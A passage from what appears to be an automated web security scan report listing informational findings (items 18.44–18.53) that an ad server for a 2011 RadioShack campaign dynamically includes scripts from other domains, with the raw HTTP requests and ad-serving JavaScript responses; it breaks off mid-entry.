document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2000985820?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.44. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296268925

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2145795389/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2145795389?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.45. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270656

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:16:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/845536281/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=845536281?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.46. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270288

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/682100952/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=682100952?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.47. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806249011/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806249011?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.48. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2667
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/71017
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/710176644/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=710176644?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.49. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:08:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1824141209?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.50. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296271345

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:27:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1076249577/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1076249577?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.51. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296269250

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:59:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/838084819/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=838084819?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.52. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:36:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1452529046?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.53. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
